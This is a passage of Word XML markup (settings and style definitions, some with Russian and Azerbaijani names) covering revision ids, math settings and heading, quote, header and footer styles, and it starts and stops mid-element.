    <w:rsid w:val="00DA1778"/>
    <w:rsid w:val="00DB2391"/>
    <w:rsid w:val="00DC5AD5"/>
    <w:rsid w:val="00DD6939"/>
    <w:rsid w:val="00DE76DE"/>
    <w:rsid w:val="00E00C7E"/>
    <w:rsid w:val="00E11774"/>
    <w:rsid w:val="00E14A5D"/>
    <w:rsid w:val="00E210A8"/>
    <w:rsid w:val="00E44C6F"/>
    <w:rsid w:val="00E53A73"/>
    <w:rsid w:val="00E704C4"/>
    <w:rsid w:val="00E7264E"/>
    <w:rsid w:val="00EA1338"/>
    <w:rsid w:val="00EC0FA5"/>
    <w:rsid w:val="00EC6C0A"/>
    <w:rsid w:val="00ED16DD"/>
    <w:rsid w:val="00EF3297"/>
    <w:rsid w:val="00EF72D4"/>
    <w:rsid w:val="00F128B5"/>
    <w:rsid w:val="00F13368"/>
    <w:rsid w:val="00F20904"/>
    <w:rsid w:val="00F30039"/>
    <w:rsid w:val="00F342C5"/>
    <w:rsid w:val="00F44911"/>
    <w:rsid w:val="00F51BDF"/>
    <w:rsid w:val="00F54D36"/>
    <w:rsid w:val="00F61012"/>
    <w:rsid w:val="00F65EF9"/>
    <w:rsid w:val="00F674E3"/>
    <w:rsid w:val="00F73495"/>
    <w:rsid w:val="00F91A55"/>
    <w:rsid w:val="00FA7233"/>
    <w:rsid w:val="00FB6E73"/>
    <w:rsid w:val="00FC68A2"/>
    <w:rsid w:val="00FF16E9"/>
    <w:rsid w:val="00FF33F3"/>
    <w:rsid w:val="00FF6917"/>
  </w:rsids>
  <m:mathPr>
    <m:mathFont m:val="Cambria Math"/>
    <m:brkBin m:val="before"/>
    <m:brkBinSub m:val="--"/>
    <m:smallFrac m:val="0"/>
    <m:dispDef/>
    <m:lMargin m:val="0"/>
    <m:rMargin m:val="0"/>
    <m:defJc m:val="centerGroup"/>
    <m:wrapIndent m:val="1440"/>
    <m:intLim m:val="subSup"/>
    <m:naryLim m:val="undOvr"/>
  </m:mathPr>
  <w:themeFontLang w:val="ru-RU"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9B3DD"/>
  <w15:docId w15:val="{54CB8F9D-8870-43EC-B5BA-1FEB98472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59"/>
    <w:lsdException w:name="Plain Table 2" w:uiPriority="59"/>
    <w:lsdException w:name="Grid Table Light" w:uiPriority="40"/>
    <w:lsdException w:name="Grid Table 4" w:uiPriority="59"/>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1410"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="256" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times Roman AzLat" w:eastAsia="MS Mincho" w:hAnsi="Times Roman AzLat" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="004D386F"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="360" w:after="120"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="20"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="360" w:after="200" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="34"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="30"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="320" w:after="200" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="40"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="320" w:after="200" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="50"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="320" w:after="200" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="60"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="320" w:after="200" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="70"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="320" w:after="200" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="80"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="320" w:after="200" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="90"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="320" w:after="200" w:line="259" w:lineRule="auto"/>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43494"/>
    <w:pPr>
      <w:spacing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743494"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsia="MS Mincho" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00043BFF"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="a6">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00FC68A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7">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A15417"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A15417"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="004D386F"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00352ED1"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="No Spacing"/>
    <w:aliases w:val="Mətn redaktoru"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="007D4A70"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="MS Mincho" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0004332E"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
      </w:tabs>
      <w:spacing w:after="100"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:noProof/>
      <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="Заголовок 2 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="34"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="Заголовок 3 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="Заголовок 4 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="Заголовок 5 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="60">
    <w:name w:val="Заголовок 6 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="6"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="70">
    <w:name w:val="Заголовок 7 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="7"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="80">
    <w:name w:val="Заголовок 8 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="8"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="90">
    <w:name w:val="Заголовок 9 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="9"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="34"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading8Char">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="IntenseQuoteChar">
    <w:name w:val="Intense Quote Char"/>
    <w:uiPriority w:val="30"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CaptionChar">
    <w:name w:val="Caption Char"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FootnoteTextChar">
    <w:name w:val="Footnote Text Char"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EndnoteTextChar">
    <w:name w:val="Endnote Text Char"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="Title"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="ac"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:before="300" w:after="200" w:line="259" w:lineRule="auto"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ac">
    <w:name w:val="Заголовок Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ab"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ad">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="ae"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:before="200" w:after="200" w:line="259" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ae">
    <w:name w:val="Подзаголовок Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ad"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="21">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="22"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="720" w:right="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:i/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="22">
    <w:name w:val="Цитата 2 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="21"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="af0"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="5" w:color="FFFFFF"/>
        <w:left w:val="single" w:sz="4" w:space="10" w:color="FFFFFF"/>
        <w:bottom w:val="single" w:sz="4" w:space="5" w:color="FFFFFF"/>
        <w:right w:val="single" w:sz="4" w:space="10" w:color="FFFFFF"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
      <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="720" w:right="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:i/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af0">
    <w:name w:val="Выделенная цитата Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af"/>
    <w:uiPriority w:val="30"/>
    <w:rsid w:val="00970685"/>
    <w:rPr>
      <w:i/>
      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af1">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af2"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="7143"/>
        <w:tab w:val="right" w:pos="14287"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af2">
    <w:name w:val="Верхний колонтитул Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af3">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af4"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="7143"/>
        <w:tab w:val="right" w:pos="14287"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af4">
    <w:name w:val="Нижний колонтитул Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af3"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00970685"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af5">
    <w:name w:val="caption"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="35"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00970685"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
